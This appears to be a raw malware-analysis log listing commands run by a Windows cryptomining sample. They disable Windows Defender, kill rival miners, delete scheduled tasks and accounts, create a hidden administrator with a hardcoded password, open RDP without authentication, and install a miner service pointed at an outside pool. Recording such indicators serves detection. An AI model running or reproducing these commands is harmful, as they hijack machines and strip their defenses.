Technical Information (commands, file paths and other artifacts recorded during analysis of the sample; entries are listed as observed, not in execution order)
- '<SYSTEM32>\net.exe' stop LocalConnectXdc
- '<SYSTEM32>\net.exe' stop WindowsDefender
- '<SYSTEM32>\net.exe' stop LocalConnectMnr
- '<SYSTEM32>\net.exe' stop Service4
- '<SYSTEM32>\net.exe' stop sqlservrd
- '<SYSTEM32>\taskkill.exe' /IM cpuminer-sse42.exe /F
- '<SYSTEM32>\taskkill.exe' /IM msdtced.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im HostXmrig.exe
- '<SYSTEM32>\taskkill.exe' /f /im 1.exe
- '<SYSTEM32>\net.exe' stop AdobeFlashPlayerHash
- '<SYSTEM32>\net.exe' stop reg
- '<SYSTEM32>\net.exe' stop RpcEptManger
- '<SYSTEM32>\net.exe' stop Samserver
- '<SYSTEM32>\net.exe' stop WinRDPSvc
- '<SYSTEM32>\net.exe' stop "CCOM Surrogate"
- '<SYSTEM32>\net.exe' stop MsUpdateServiceD
- '<SYSTEM32>\net.exe' stop TaskNetHost
- '<SYSTEM32>\net.exe' stop RegGroom
- '<SYSTEM32>\net.exe' stop Googler
- '<SYSTEM32>\net.exe' stop svchost
- '<SYSTEM32>\net.exe' stop WSService
- '<SYSTEM32>\taskkill.exe' /IM msiexeced.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im user.exe
- '<SYSTEM32>\taskkill.exe' /f /im microsoft.exe
- '<SYSTEM32>\taskkill.exe' /f /im *tmp.exe
- '<SYSTEM32>\taskkill.exe' /f /im schtasks*
- '<SYSTEM32>\taskkill.exe' /f /im microsofts*
- '<SYSTEM32>\taskkill.exe' /f /im xmr*
- '<SYSTEM32>\taskkill.exe' /f /im wscript.exe
- '<SYSTEM32>\taskkill.exe' /f /im esif.exe
- '<SYSTEM32>\taskkill.exe' /f /im tmp*
- '<SYSTEM32>\taskkill.exe' /f /im rigx*
- '<SYSTEM32>\taskkill.exe' /f /im msiexec.exe
- '<SYSTEM32>\taskkill.exe' /f /im sa.exe
- '<SYSTEM32>\taskkill.exe' /IM monero.exe /F
- '<SYSTEM32>\taskkill.exe' /IM minerg.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im ggdllhost.exe
- '<SYSTEM32>\taskkill.exe' /IM cpuminer.exe /F
- '<SYSTEM32>\taskkill.exe' /f /im Service4.exe
- '<SYSTEM32>\taskkill.exe' /f /im bitsadmin.exe
- '<SYSTEM32>\taskkill.exe' /f /im mxsvc.exe
- '<SYSTEM32>\taskkill.exe' /f /im update.exe
- '<SYSTEM32>\taskkill.exe' /f /im SystemRunDll3.exe
- %WINDIR%\Temp\Perflib_Perfdata_7e8.dat
- ClassName: '' WindowName: ''
- '<SYSTEM32>\sc.exe' config RpcEptManger start= Disabled
- '<SYSTEM32>\net1.exe' stop WinRDPSvc
- '<SYSTEM32>\sc.exe' config WinRDPSvc start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config WinDefend start= disabled
- '<SYSTEM32>\net1.exe' stop RpcEptManger
- '<SYSTEM32>\cmd.exe' /c sc config MsUpdateServiceD start= Disabled
- '<SYSTEM32>\net1.exe' stop Samserver
- '<SYSTEM32>\cmd.exe' /c sc config RpcEptManger start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop RpcEptManger
- '<SYSTEM32>\cmd.exe' /c net stop MsUpdateServiceD
- '<SYSTEM32>\cmd.exe' /c sc config WinRDPSvc start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop WinRDPSvc
- '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@!
- '<SYSTEM32>\cmd.exe' /c net user sqlserver h4ckerz90-@! /ADD
- '<SYSTEM32>\net1.exe' stop MsUpdateServiceD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administrators sqlserver /ADD
- '<SYSTEM32>\sc.exe' config "CCOM Surrogate" start= Disabled
- '<SYSTEM32>\cmd.exe' /c net localgroup "Remote Desktop users" sqlserver /ADD
- '<SYSTEM32>\sc.exe' stop WinDefend
- '<SYSTEM32>\sc.exe' config MsUpdateServiceD start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc stop WinDefend
- '<SYSTEM32>\cmd.exe' /c sc config "CCOM Surrogate" start= Disabled
- '<SYSTEM32>\sc.exe' config WinDefend start= disabled
- '<SYSTEM32>\cmd.exe' /c net stop "CCOM Surrogate"
- '<SYSTEM32>\sc.exe' config TaskNetHost start= Disabled
- '<SYSTEM32>\sc.exe' config RegGroom start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config Googler start= Disabled
- '<SYSTEM32>\net1.exe' stop RegGroom
- '<SYSTEM32>\cmd.exe' /c sc config WSService start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop WSService
- '<SYSTEM32>\cmd.exe' /c sc config TaskNetHost start= Disabled
- '<SYSTEM32>\net1.exe' stop sqlservrd
- '<SYSTEM32>\sc.exe' config Service4 start= Disabled
- '<SYSTEM32>\net1.exe' stop reg
- '<SYSTEM32>\cmd.exe' /c net stop Googler
- '<SYSTEM32>\net1.exe' stop Service4
- '<SYSTEM32>\net1.exe' stop WSService
- '<SYSTEM32>\cmd.exe' /c net stop Samserver
- '<SYSTEM32>\sc.exe' config WSService start= Disabled
- '<SYSTEM32>\sc.exe' config Samserver start= Disabled
- '<SYSTEM32>\net1.exe' stop svchost
- '<SYSTEM32>\cmd.exe' /c sc config Samserver start= Disabled
- '<SYSTEM32>\net1.exe' stop Googler
- '<SYSTEM32>\cmd.exe' /c net stop svchost
- '<SYSTEM32>\sc.exe' config Googler start= Disabled
- '<SYSTEM32>\sc.exe' config svchost start= Disabled
- '<SYSTEM32>\net1.exe' stop TaskNetHost
- '<SYSTEM32>\cmd.exe' /c sc config svchost start= Disabled
- '<SYSTEM32>\net1.exe' accounts / MaxPWAge: unlimited
- '<SYSTEM32>\net1.exe' localgroup Administratorer sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Administrateurs sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c reg add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' user sqlserver /expires:never
- '<SYSTEM32>\net.exe' localgroup Administratoren sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Administratorzy sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net accounts / MaxPWAge: unlimited
- '<SYSTEM32>\net1.exe' localgroup Administratoren sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net user sqlserver /active:yes
- '<SYSTEM32>\net.exe' accounts / MaxPWAge: unlimited
- '<SYSTEM32>\cmd.exe' /c gpupdate /force
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
- '<SYSTEM32>\cmd.exe' /c SCHTASKS /Delete /TN * /F
- '<SYSTEM32>\gpupdate.exe' /force
- '<SYSTEM32>\net.exe' start termservice
- '<SYSTEM32>\schtasks.exe' /Delete /TN * /F
- '<SYSTEM32>\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net.exe' user sqlserver /active:yes
- '<SYSTEM32>\cmd.exe' /c net start termservice
- '<SYSTEM32>\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sqlserver /t REG_DWORD /d 0 /f
- '<SYSTEM32>\net1.exe' user sqlserver /active:yes
- '<SYSTEM32>\net.exe' localgroup "Remote Desktop users" sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administrateurs sqlserver /ADD
- '<SYSTEM32>\net.exe' localgroup Administradores sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Administradores sqlserver /ADD
- '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@! /ADD
- '<SYSTEM32>\net.exe' localgroup Administrators sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Amministratori sqlserver /ADD
- '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@! /ADD
- '<SYSTEM32>\net1.exe' stop "CCOM Surrogate"
- '<SYSTEM32>\net.exe' localgroup Amministratori sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administradores sqlserver /ADD
- '<SYSTEM32>\net.exe' user sqlserver h4ckerz90-@!
- '<SYSTEM32>\cmd.exe' /c net user sqlserver /expires:never
- '<SYSTEM32>\net.exe' localgroup Administrateurs sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administratorer sqlserver /ADD
- '<SYSTEM32>\net.exe' user sqlserver /expires:never
- '<SYSTEM32>\net1.exe' localgroup Administrators sqlserver /ADD
- '<SYSTEM32>\net.exe' localgroup Administratorer sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup Amministratori sqlserver /ADD
- '<SYSTEM32>\net1.exe' localgroup "Remote Desktop users" sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c net localgroup Administratorzy sqlserver /ADD
- '<SYSTEM32>\net.exe' localgroup Administratorzy sqlserver /ADD
- '<SYSTEM32>\net1.exe' user sqlserver h4ckerz90-@!
- '<SYSTEM32>\cmd.exe' /c net localgroup Administratoren sqlserver /ADD
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.bat
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\*.vbs
- '<SYSTEM32>\cmd.exe' /c taskkill /IM msdtced.exe /F
- '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.exe
- '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.bat
- '<SYSTEM32>\cmd.exe' /c del /a %programdata%\*.vbs
- '<SYSTEM32>\cmd.exe' /c taskkill /IM minerg.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /IM monero.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im ggdllhost.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /IM msiexeced.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer-sse42.exe /F
- '<SYSTEM32>\cmd.exe' /c taskkill /IM cpuminer.exe /F
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx64
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\xx32
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\32
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\mpl.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x64
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\x32
- '<SYSTEM32>\cmd.exe' /c del /q /a <SYSTEM32>\monero.exe
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsofts.exe
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\microsoft.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x32
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64n
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\x64
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im xmr*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im rigx*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im wscript.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsofts*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im esif.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im microsoft.exe
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Description "sqlbrowser"
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers AppParameters "-a cryptonight -o cloudfront-lc.ddnsking.com:443 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5v...
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost install sqlbrowsers "%windir%\fonts\sqlservr.exe"
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost start sqlbrowsers
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers Start SERVICE_DELAYED_AUTO_START
- '<SYSTEM32>\cmd.exe' /c %windir%\fonts\conhost set sqlbrowsers DisplayName "sqlserverd"
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im bitsadmin.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im update.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im msiexec.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %windir%\temp
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im SystemRunDll3.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im sa.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im user.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im schtasks*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im tmp*
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im mxsvc.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im Service4.exe
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im *tmp.exe
- '<SYSTEM32>\sc.exe' config WindowsDefender start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop sqlservrd
- '<SYSTEM32>\cmd.exe' /c sc config LocalConnectMnr start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop Service4
- '<SYSTEM32>\cmd.exe' /c sc config sqlservrd start= Disabled
- '<SYSTEM32>\sc.exe' config LocalConnectXdc start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop LocalConnectXdc
- '<SYSTEM32>\sc.exe' config AdobeFlashPlayerHash start= Disabled
- '<SYSTEM32>\net1.exe' user systems /delete
- '<SYSTEM32>\cmd.exe' /c net stop LocalConnectMnr
- '<SYSTEM32>\net1.exe' stop AdobeFlashPlayerHash
- '<SYSTEM32>\cmd.exe' /c sc config LocalConnectXdc start= Disabled
- '<SYSTEM32>\net1.exe' stop LocalConnectMnr
- '<SYSTEM32>\cmd.exe' /c net stop RegGroom
- '<SYSTEM32>\net1.exe' stop LocalConnectXdc
- '<SYSTEM32>\cmd.exe' /c net stop TaskNetHost
- '<SYSTEM32>\sc.exe' config reg start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config RegGroom start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config Service4 start= Disabled
- '<SYSTEM32>\sc.exe' config LocalConnectMnr start= Disabled
- '<SYSTEM32>\net1.exe' stop WindowsDefender
- '<SYSTEM32>\cmd.exe' /c sc config reg start= Disabled
- '<SYSTEM32>\sc.exe' config sqlservrd start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop reg
- '<SYSTEM32>\net.exe' user Admiin /delete
- '<SYSTEM32>\cmd.exe' /c net user .system /delete
- '<SYSTEM32>\cmd.exe' /c net user emad /delete
- '<SYSTEM32>\cmd.exe' /c net user systems /delete
- '<SYSTEM32>\net.exe' user emad /delete
- '<SYSTEM32>\net.exe' user sysdba /delete
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\csrss.exe
- '<SYSTEM32>\cmd.exe' /c del /a %windir%\dllhostts.exe
- '<SYSTEM32>\cmd.exe' /c rmdir /s /q %programdata%\ServiceProfiles
- '<SYSTEM32>\cmd.exe' /c net user ` /delete
- '<SYSTEM32>\cmd.exe' /c net user Admiin /delete
- '<SYSTEM32>\cmd.exe' /c net user sysdba /delete
- '<SYSTEM32>\net1.exe' user ` /delete
- '<SYSTEM32>\net1.exe' user sysdba /delete
- '<SYSTEM32>\cmd.exe' /c sc config AdobeFlashPlayerHash start= Disabled
- '<SYSTEM32>\cmd.exe' /c sc config WindowsDefender start= Disabled
- '<SYSTEM32>\cmd.exe' /c net stop WindowsDefender
- '<SYSTEM32>\net1.exe' user emad /delete
- '<SYSTEM32>\net.exe' user ` /delete
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im HostXmrig.exe
- '<SYSTEM32>\net1.exe' user Admiin /delete
- '<SYSTEM32>\cmd.exe' /c net stop AdobeFlashPlayerHash
- '<SYSTEM32>\net.exe' user systems /delete
- '<SYSTEM32>\cmd.exe' /c taskkill /f /im 1.exe